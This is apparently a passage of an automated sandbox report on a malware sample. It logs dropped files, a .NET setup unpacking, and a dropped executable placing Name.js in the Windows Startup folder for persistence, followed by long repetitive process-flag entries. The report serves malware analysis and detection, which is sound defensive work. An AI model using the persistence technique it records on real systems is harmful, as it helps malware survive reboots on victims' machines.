        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1031\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\2070\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1032\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1030\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1040\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1041\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1037\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\SetupUi.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1038\SetupResources.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\3076\SetupResources.dllJump to dropped file
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeFile created: C:\ProgramData\essam@sasa2023.exeJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\sqmapi.dllJump to dropped file
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1033\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1025\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1028\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1030\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1031\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1029\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1036\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1035\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1032\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1038\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1037\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1040\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1041\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1042\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1044\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1043\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1046\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1045\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1055\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1053\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\2052\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1049\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\3082\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\2070\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\3076\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\Users\user\AppData\Local\Temp\dd_dotNetFx40_Client_setup_decompression_log.txtJump to behavior

        Boot Survival

        barindex
        Drops script or batch files to the startup folder
        Source: C:\ProgramData\essam@sasa2023.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.jsJump to dropped file
        Source: C:\ProgramData\essam@sasa2023.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.jsJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.jsJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\VSSetupJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D9F721 StartServiceW,4_2_69D9F721
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\essam@sasa2023.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
